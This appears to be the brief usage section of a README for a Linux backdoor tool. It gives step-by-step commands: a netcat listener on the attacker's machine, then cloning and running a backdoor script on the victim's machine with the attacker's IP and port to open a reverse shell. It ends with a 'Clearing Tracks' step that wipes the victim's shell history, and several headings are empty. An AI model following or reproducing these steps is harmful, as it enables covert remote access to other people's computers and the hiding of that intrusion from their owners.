Usage :
~ Attacker's PC ~
$ nc -lvnp 443
~ Victim's PC ~
$ git clone https://github.com/KingstonCyberSec/linux_backdoor.git
$ cd linux_backdoor
$ chmod +x *
$ bash backdoor.sh (Attacker IP) (Port)
Images :
Clearing Tracks :
~ Victim's PC ~
$ history -c
Note :

